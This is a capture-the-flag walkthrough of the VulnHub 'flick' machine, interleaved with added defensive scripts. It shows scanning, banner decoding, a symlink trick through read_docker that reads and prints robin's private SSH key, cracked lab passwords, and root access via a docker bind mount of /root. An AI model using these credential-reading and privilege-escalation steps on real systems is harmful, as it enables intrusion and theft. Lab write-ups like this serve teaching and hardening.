Today I happened to come across a write-up for a VulnHub machine that looked interesting, so I decided to work through it myself and record the process.
Download the machine and import it into VMware:

https://download.vulnhub.com/flick/flick.tar.gz

First, scan the whole subnet with fping to find the target's IP:
fping -g 192.168.142.0/24

Once we have the target IP, use Nmap to check which ports the server has open:
nmap -sV -p1-65535 192.168.142.35

This shows that ports 22 and 8881 are open.
root@kali:/# nmap -sV -p1-65535 192.168.142.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 17:26 CST
Nmap scan report for 192.168.142.35
Host is up (0.00081s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
8881/tcp open  galaxy4d?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8881-TCP:V=7.80%I=7%D=10/2%Time=5F76F239%P=x86_64-pc-linux-gnu%r(NU
SF:LL,5F,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20pas
SF:sword\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x2
SF:0door:\n>\x20")%r(GetRequest,78,"Welcome\x20to\x20the\x20admin\x20serve
SF:r\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switch\x20
SF:and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/\x20HTTP/1\.0\r\n
SF:\r\n\n>\x20")%r(FourOhFourRequest,9B,"Welcome\x20to\x20the\x20admin\x20
SF:server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switc
SF:h\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/nice ports
SF:,/Trinity\.txt.bak\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(GenericLines,6
SF:A,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20passwor
SF:d\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20doo
SF:r:\n>\x20OK:\x20\r\n\r\n\n>\x20")%r(HTTPOptions,7C,"Welcome\x20to\x20th
SF:e\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x
SF:20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPTION
SF:S\x20/\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(RTSPRequest,7C,"Welcome\x20to\x2
SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick
SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPT
SF:IONS\x20/\x20RTSP/1\.0\r\n\r\n\n>\x20")%r(RPCCheck,92,"Welcome\x20to\x2
SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick
SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\x8
SF:0\0\0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n>\x20")%r(DNSVersionBindReqTCP,86,"W
SF:elcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20password\x2
SF:0will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n
SF:>\x20OK:\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0
SF:\x10\0\x03\n>\x20")%r(DNSStatusRequestTCP,74,"Welcome\x20to\x20the\x20a
SF:dmin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\
SF:x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\0\x0c\0\0\x
SF:10\0\0\0\0\0\0\0\0\0\n>\x20");
MAC Address: 00:0C:29:36:25:9B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.72 seconds

Let's first try connecting to the server over SSH:
ssh 192.168.142.35

The server banner gives us a long hex string:
Converting the hex to characters yields a long base64 string that has to be decoded several times over, so I wrote a quick script for it:
import base64

# Paste the hex string from the SSH banner here
a = """
<hex>
"""

# Drop whitespace, then turn the hex into text: that gives the outer base64 layer
b = bytes.fromhex("".join(a.split())).decode("utf-8")

# Keep decoding until the result is no longer valid base64 / UTF-8
while True:
    try:
        b = base64.b64decode(b).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        break

print(b)

After the last successful decode the script prints the recovered plaintext.
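The quick script above stops when a layer no longer decodes, but it cannot tell hex from base64 and leaves the hex step to be done by hand. The following is an added example (not the author's script) that peels hex and base64 layers automatically and reports which layers it removed. SAMPLE_BANNER is constructed here by wrapping the token the write-up recovers, not the real banner from the box.

```python
import base64
import binascii
import re

# Constructed sample (not the real banner): a short token wrapped in three
# base64 layers and then hex-encoded, like the SSH banner described above.
SAMPLE_TOKEN = "tabupJievas8Knoj"


def build_sample(token: str, b64_layers: int = 3) -> str:
    data = token.encode()
    for _ in range(b64_layers):
        data = base64.b64encode(data)
    return data.hex()


SAMPLE_BANNER = build_sample(SAMPLE_TOKEN)

_HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _printable_text(data: bytes):
    """Return data as str if it is valid UTF-8 made of printable characters, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def _peel_one(layer: str):
    """Try hex first, then base64; return (decoded_text, kind) or None."""
    attempts = []
    if len(layer) % 2 == 0 and _HEX_RE.match(layer):
        attempts.append(("hex", lambda: bytes.fromhex(layer)))
    if len(layer) % 4 == 0 and _B64_RE.match(layer):
        attempts.append(("base64", lambda: base64.b64decode(layer, validate=True)))
    for kind, decode in attempts:
        try:
            text = _printable_text(decode())
        except (ValueError, binascii.Error):
            continue
        if text is not None and text != layer:
            return text, kind
    return None


def unwrap(blob: str, max_layers: int = 32):
    """Peel hex/base64 layers until nothing decodes cleanly.
    Returns (innermost_text, [kinds of layers removed, outermost first])."""
    current = "".join(blob.split())   # drop newlines/whitespace from a pasted banner
    layers = []
    for _ in range(max_layers):
        peeled = _peel_one(current)
        if peeled is None:
            break
        current, kind = peeled
        layers.append(kind)
    return current, layers


if __name__ == "__main__":
    text, layers = unwrap(SAMPLE_BANNER)
    print(layers, text)
```

The decoder stops at the first layer that does not yield printable UTF-8, which is also what ends the author's loop; the difference is that each layer's encoding is detected from its alphabet and length, so a banner that is hex on the outside and base64 inside needs no manual conversion. Trying hex before base64 matters because every hex string is also a syntactically valid base64 string.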
The recovered plaintext is tabupJievas8Knoj. Next, we try connecting to the open port 8881 with nc:
root@kali:/# nc 192.168.142.35 8881
Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
>

After connecting, the service tells us a password is needed to open the next door, so we enter the plaintext we just recovered:
root@kali:/# nc 192.168.142.35 8881
Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
> tabupJievas8Knoj
OK: tabupJievas8Knoj
Accepted! The door should be open now :poolparty:

It reports that the next door is open, so we run the Nmap port scan again:
root@kali:/# nmap -sV -p1-65535 192.168.142.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-03 13:14 CST
Nmap scan report for 192.168.142.35
Host is up (0.00066s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.22 ((Ubuntu))
8881/tcp open  galaxy4d?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8881-TCP:V=7.80%I=7%D=10/3%Time=5F7808D9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,5F,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20pas
SF:sword\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x2
SF:0door:\n>\x20")%r(GetRequest,78,"Welcome\x20to\x20the\x20admin\x20serve
SF:r\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switch\x20
SF:and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/\x20HTTP/1\.0\r\n
SF:\r\n\n>\x20")%r(FourOhFourRequest,9B,"Welcome\x20to\x20the\x20admin\x20
SF:server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switc
SF:h\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/nice ports
SF:,/Trinity\.txt.bak\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(GenericLines,6
SF:A,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20passwor
SF:d\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20doo
SF:r:\n>\x20OK:\x20\r\n\r\n\n>\x20")%r(HTTPOptions,7C,"Welcome\x20to\x20th
SF:e\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x
SF:20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPTION
SF:S\x20/\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(RTSPRequest,7C,"Welcome\x20to\x2
SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick
SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPT
SF:IONS\x20/\x20RTSP/1\.0\r\n\r\n\n>\x20")%r(RPCCheck,92,"Welcome\x20to\x2
SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick
SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\x8
SF:0\0\0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n>\x20")%r(DNSVersionBindReqTCP,86,"W
SF:elcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20password\x2
SF:0will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n
SF:>\x20OK:\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0
SF:\x10\0\x03\n>\x20")%r(DNSStatusRequestTCP,74,"Welcome\x20to\x20the\x20a
SF:dmin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\
SF:x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\0\x0c\0\0\x
SF:10\0\0\0\0\0\0\0\0\0\n>\x20");
MAC Address: 00:0C:29:36:25:9B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.43 seconds

Port 80 is now open. Opening it in a browser gives the following page:
There is a login form, and a note beside it mentions a test user, so we try brute-forcing the credentials.

Eventually we get the username demo and the password demo123.
After logging in we find an upload feature, but after testing it turns out not to be exploitable, so we need a different approach.

I was stuck for a long time with no ideas; after consulting someone else's write-up, it turns out the download page has a directory traversal vulnerability.

There appears to be some filtering in place here, which we get around by another route.
By reading the site's configuration file we obtain the database path, and from the database we read the user records.

Reading the SQLite database gives us the passwords for robin and dean:
robin: JoofimOwEakpalv4Jijyiat5GloonTojatticEirracksIg4yijovyirtAwUjad1
dean : FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0OlNiphAnA

Then we try logging in over SSH: the robin account won't let us in, but dean logs in successfully:
Looking at the home directory, we find message.txt and read_docker.

First we read message.txt. Since this blogger is a poor student who can't read English, I won't translate it here; the gist is that we should use read_docker to run against the file under /home/robin/flick-dev.
dean@flick:~$ cat message.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Dean,

I will be away on leave for the next few weeks. I have asked the admin guys
to write a quick script that will allow you to read my .dockerfile for flick-
a-photo so that you can continue working in my absense.

The .dockerfile is in my home, so the path for the script will be something
like /home/robin/flick-dev/

Please call me if you have any troubles!

- --
Ciao
Robin
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJT32ZsAAoJENRCTh/agc2DTNIP/0+ut1jWzk7VgJlT6tsGB0Ah
yi24i2b+JAVtINzCNgJ+rXUStaAEudTvJDF28b/wZCaFVFoNJ8Q30J03FXo4SRnA
ZW6HZZIGEKdlD10CcXsQrLMRmWZlBDQnCm4+EMOvavS1uU9gVvcaYhnow6uwZlwR
enf71LvtS1h0+PrFgSIoItBI4/lx7BiYY9o3hJyaQWkmAZsZLWQpJtROe8wsxb1l
9o4jCJrADeJBsYM+xLExsXaEobHfKtRtsM+eipHXIWIH+l+xTi8Y1/XIlgEHCelU
jUg+Hswq6SEch+1T5B+9EPoeiLT8Oi2Rc9QePSZ3n0fe4f3WJ47lEYGLLEUrKNG/
AFLSPnxHTVpHNO72KJSae0cG+jpj1OKf3ErjdTk1PMJy75ntQCrgtnGnp9xvpk0b
0xg6cESLGNkrqDGopsN/mgi6+2WKtUuO5ycwVXFImY3XYl+QVZgd/Ntpu4ZjyZUT
lxqCAk/G1s43s+ySFKSoHZ8c/CuOKTsyn6uwI3NxBZPD04xfzoc0/R/UpIpUmneK
q9LddBQK4vxPab8i4GNDiMp+KXyfByO864PtKQnCRkGQewanxoN0lmjB/0eKhkmf
Yer1sBmumWjjxR8TBY3cVRMH93zpIIwqxRNOG6bnnSVzzza5DJuNssppCmXLOUL9
nZAuFXkGFu6cMMD4rDXQ
=2moZ
-----END PGP SIGNATURE-----
dean@flick:~$

Following the message, we run it against /home/robin/flick-dev:
dean@flick:~$ ./read_docker /home/robin/flick-dev
# Flick-a-photo dev env
RUN apt-get update && apt-get install -y php5 libapache2-mod-php5 php5-mysql php5-cli && apt-get clean && rm -rf /var/lib/apt/lists/*
CMD ["/usr/sbin/apache2", "-D", "FOREGROUND"]

This turns out not to be of any practical use, so we turn our attention to the read_docker binary itself and try running it on the current directory:
dean@flick:~$ ./read_docker .
ERROR: the specified docker file doesn't exist: ./Dockerfile
Usage is: ./read_docker /path/to/dockerfile

So it reads a file named Dockerfile inside whatever directory we specify, which means we can use a symlink to make it read any of robin's files.
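The weakness in read_docker is that it trusts the path it is given and follows symlinks, so a caller who cannot read robin's files directly can still have the helper read them on their behalf. As an added illustration that is not the box's code, the Python below puts a naive reader with that behaviour next to a hardened one that refuses symlinks, non-regular files and anything resolving outside the directory robin meant to share. The temporary directory layout, helper names and the "private key" contents are all constructed for the demo.

```python
import errno
import os
import shutil
import stat
import tempfile


def read_dockerfile_naive(directory: str) -> str:
    """Behaviour seen in the write-up: open <directory>/Dockerfile and return
    whatever it points to, symlink or not."""
    with open(os.path.join(directory, "Dockerfile"), "r") as fh:
        return fh.read()


def read_dockerfile_hardened(directory: str, allowed_root: str) -> str:
    """Same interface, but refuses symlinks, non-regular files and any path
    that resolves outside allowed_root (the directory robin meant to share)."""
    allowed_root = os.path.realpath(allowed_root)
    path = os.path.join(directory, "Dockerfile")
    try:
        # O_NOFOLLOW: fail with ELOOP if the final path component is a symlink
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise PermissionError("Dockerfile is a symlink") from exc
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("Dockerfile is not a regular file")
        # Directory components may still be symlinks: resolve and bound them.
        real = os.path.realpath(path)
        if os.path.commonpath([real, allowed_root]) != allowed_root:
            raise PermissionError("Dockerfile resolves outside the allowed directory")
        # Make sure the file we opened is the one we just resolved (dev/inode match).
        real_st = os.stat(real)
        if (real_st.st_dev, real_st.st_ino) != (st.st_dev, st.st_ino):
            raise PermissionError("Dockerfile changed between check and open")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "r") as fh:
        return fh.read()


def build_scenario() -> str:
    """Constructed layout in a temp dir (no real keys involved):
      flick-dev/Dockerfile      the file robin intended to share
      robin/Dockerfile          a private file in robin's home
      robin/.ssh/id_rsa         stand-in for the secret read in the write-up
      dean/Dockerfile -> robin/.ssh/id_rsa   the symlink trick
      dean2 -> robin            directory-symlink variant of the same trick"""
    root = tempfile.mkdtemp(prefix="flick-demo-")
    os.makedirs(os.path.join(root, "flick-dev"))
    os.makedirs(os.path.join(root, "robin", ".ssh"))
    os.makedirs(os.path.join(root, "dean"))
    files = {
        ("flick-dev", "Dockerfile"): "FROM ubuntu\n",
        ("robin", "Dockerfile"): "robin's private Dockerfile\n",
        ("robin", ".ssh", "id_rsa"): "NOT-A-REAL-KEY (constructed)\n",
    }
    for parts, content in files.items():
        with open(os.path.join(root, *parts), "w") as fh:
            fh.write(content)
    os.symlink(os.path.join(root, "robin", ".ssh", "id_rsa"),
               os.path.join(root, "dean", "Dockerfile"))
    os.symlink(os.path.join(root, "robin"), os.path.join(root, "dean2"))
    return root


def run_demo() -> dict:
    """Run both readers over the scenario and return what each one yielded."""
    root = build_scenario()
    allowed = os.path.join(root, "flick-dev")
    results = {}
    try:
        results["naive_symlink"] = read_dockerfile_naive(os.path.join(root, "dean"))
        for name in ("dean", "dean2"):
            try:
                results["hardened_" + name] = read_dockerfile_hardened(
                    os.path.join(root, name), allowed)
            except PermissionError as exc:
                results["hardened_" + name] = "refused: " + str(exc)
        results["hardened_legit"] = read_dockerfile_hardened(allowed, allowed)
    finally:
        shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value.strip()}")
```

O_NOFOLLOW only covers the last path component, which is why the hardened reader also resolves the full path and bounds it to the shared directory, then compares device and inode numbers so the file it checked is the file it opened. A helper that runs with another user's privileges should additionally take its input directory from a fixed allow-list rather than from the caller at all.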
Here we point the symlink straight at robin's SSH private key:
dean@flick:~$ ln -s /home/robin/.ssh/id_rsa Dockerfile
dean@flick:~$ ./read_docker .
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAlv/0uKdHFQ4oT06Kp3yg0tL1fFVl4H+iS1UOqds0HrgBCTSw
ECwVwhrIFJa/u5FOPGst8t35CKo4VWX3KNHXFNVtUXWeQFpe/rB/0wi+k8E8WtXi
FBjLiFOqTDL0kgXRoQzUPlYg0+LAXo5EbMq+rB2ZgMJTxunJFV2m+uKtbZZRvzU6
S1Fj6XHh/U0E68d6sZ/+y1UhSJLaFYUQMkfLtjxPa17sPZ+kwB1R4puhVTprfQOk
CinfW01ot2Rj2HLMR5CpgA28dmxw8W6w0MGtXurTegj1ydFOTgB1/k4XpXnSGNO9
d2AlVR/NsKDAuYKdgRGFFh91nGZTl1p4em48YwIDAQABAoIBADI3bwhVwSL0cV1m
jmAC520VcURnFhlh+PQ6lkTQvHWW1elc10yZjKbfxzhppdvYB/+52S8SuPYzvcZQ
wbCWkIPCMrfLeNSH+V2UDv58wvxaYBsJVEVAtbdhs5nhvEovmzaHELKmbAZrO3R2
tbTEfEK7GUij176oExKC8bwv1GND/qQBwLtEJj/YVJSsdvrwroCde+/oJHJ76ix4
Ty8sY5rhKYih875Gx+7IZNPSDn45RsnlORm8fd5EGLML6Vm3iLfwkHIxRdj9DFoJ
wJcPX7ZWTsmyJLwoHe3XKklz2KW185hIr9M2blMgrPC2ZuTnvBXmEWuy86+xxAB0
mFXYMdkCgYEAx6yab3huUTgTwReaVpysUEqy4c5nBLKqs6eRjVyC9jchQfOqo5AQ
l8bd6Xdrk0lvXnVkZK0vw2zwqlk8N/vnZjfWnCa4unnv2CZXS9DLaeU6gRgRQFBI
JB+zHyhus+ill4aWHitcEXiBEjUHx4roC7Al/+tr//cjwUCwlHk75F0CgYEAwZhZ
gBjAo9X+/oFmYlgVebfR3kLCD4pVPMz+HyGCyjSj0+ddsHkYiHBhstBtHh9vU+Pn
JMhrtR9yzXukuyQr/ns1mhEQOUtTaXrsy/1FyRBaISrtcyGAruu5yWubT0gXk2Dq
rwyb6M6MbnwEMZr2mSBU5l27cTKypFqgcA58l78CgYAWM5vsXxCtGTYhFzXDAaKr
PtMLBn8v54nRdgVaGXo6VEDva1+C1kbyCVutVOjyNI0cjKMACr2v1hIgbtGiS/Eb
zYOgUzHhEiPX/dNhC7NCcAmERx/L7eFHmvq4sS81891NrtpMOnf/PU3kr17REiHh
AtIG1a9pg5pHJ6E6sQw2xQKBgHXeqm+BopieDFkstAeglcK8Fr16a+lGUktojDis
EJPIpQ65yaNOt48qzXEv0aALh57OHceZd2qZsS5G369JgLe6kJIzXWtk325Td6Vj
mX+nwxh6qIP2nADkaQOnzrHgtOn4kiruRGbki0AhpfQF46qrssVnwF5Vfcrvmstf
JqDFAoGBAI9KJamhco8BBka0PUWgJ3R2ZqE1viTvyME1G25h7tJb17cIeB/PeTS1
Q9KMFl61gpl0J4rJEIakeGpXuehwYAzNBv7n6yr8CNDNkET/cVhp+LCmbS91FwAK
VP0mqDppzOZ04B9FQD8Af6kUzxzGFH8tAN5SNYSW88I9Z8lVpfkn
-----END RSA PRIVATE KEY-----

Now we log in as robin over SSH using this key directly:
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions

If you see this error, tighten the key file's permissions first and then log in again:
root@kali:/# chmod 600 id_rsa
root@kali:/# ssh -i id_rsa robin@192.168.142.35
load pubkey "id_rsa": invalid format

Once logged in, we move on to privilege escalation.

I had no idea how to escalate privileges here; after consulting a more experienced player's write-up, it turns out to be done through docker.

Using the docker command, we mount the host's /root directory onto /root inside the image, which gives us root access to the machine:
robin@flick:~$ docker run -t -i -v /root:/root ubuntu /bin/bash
root@12a586efd780:/#

Then we look for the flag:
root@12a586efd780:/# cd /root/
root@12a586efd780:/root# cat flag.txt
Errr, you are close, but this is not the flag you are looking for.
root@12a586efd780:/root# cat
.aptitude/      .bash_history   .bashrc   .cache/   .profile   .viminfo
53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc/   flag.txt
root@12a586efd780:/root# cat 53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc/real_flag.txt
Congrats! You have completed 'flick'!
I hope you have enjoyed doing it as much as I did creating it :)
ciao for now!
@leonjza
root@12a586efd780:/root#
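What makes the last step work is access to the Docker daemon: anyone who can run docker can bind-mount host paths into a container they control, so membership in the docker group is equivalent to root on the host. The following audit script is an added example and not part of the write-up; SAMPLE_GROUP is a constructed /etc/group excerpt, and WRITEUP_COMMAND is the docker run line from above expressed as an argv list. It flags docker group members and bind mounts of sensitive host paths, which is what a host-hardening check or a docker authorization plugin would look for.

```python
import os

# Constructed /etc/group excerpt (not from the target): robin is in the docker group
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:dean
docker:x:999:robin
www-data:x:33:
"""

# The docker run command used in the write-up, as an argv list
WRITEUP_COMMAND = ["docker", "run", "-t", "-i", "-v", "/root:/root", "ubuntu", "/bin/bash"]

# Host paths a bind mount should never hand to an ordinary user's container
SENSITIVE_HOST_PATHS = ("/", "/root", "/etc", "/home", "/var/run/docker.sock")


def docker_group_members(group_text: str) -> list:
    """Members of the 'docker' group from /etc/group-formatted text.
    Every member listed here is effectively root on the host."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def parse_bind_mounts(argv: list) -> list:
    """(host_path, container_path) pairs from -v / --volume options.
    Specs that do not start with '/' are named volumes, not host paths."""
    mounts = []
    i = 0
    while i < len(argv):
        arg, spec = argv[i], None
        if arg in ("-v", "--volume") and i + 1 < len(argv):
            spec, i = argv[i + 1], i + 1
        elif arg.startswith(("-v=", "--volume=")):
            spec = arg.split("=", 1)[1]
        if spec and spec.startswith("/"):
            parts = spec.split(":")
            mounts.append((parts[0], parts[1] if len(parts) > 1 else parts[0]))
        i += 1
    return mounts


def risky_mounts(argv: list) -> list:
    """Host paths in argv that are, or lie under, a sensitive host path."""
    flagged = []
    for host, _ in parse_bind_mounts(argv):
        norm = os.path.normpath(host)
        if norm in SENSITIVE_HOST_PATHS or any(
            norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/"
        ):
            flagged.append(norm)
    return flagged


def audit(group_text: str, argv: list) -> list:
    """Human-readable findings combining both checks."""
    findings = []
    for member in docker_group_members(group_text):
        findings.append(f"user {member} is in the docker group (equivalent to root on the host)")
    for path in risky_mounts(argv):
        findings.append(f"bind mount exposes sensitive host path {path}")
    if "--privileged" in argv:
        findings.append("container runs with --privileged")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GROUP, WRITEUP_COMMAND):
        print(finding)
```

On a real host the group text would come from /etc/group (or getent group docker) and the argv from process auditing or a daemon authorization plugin; the remediation is to keep ordinary users out of the docker group and, where they need containers, to use rootless Docker or a policy that rejects bind mounts outside an allow-list.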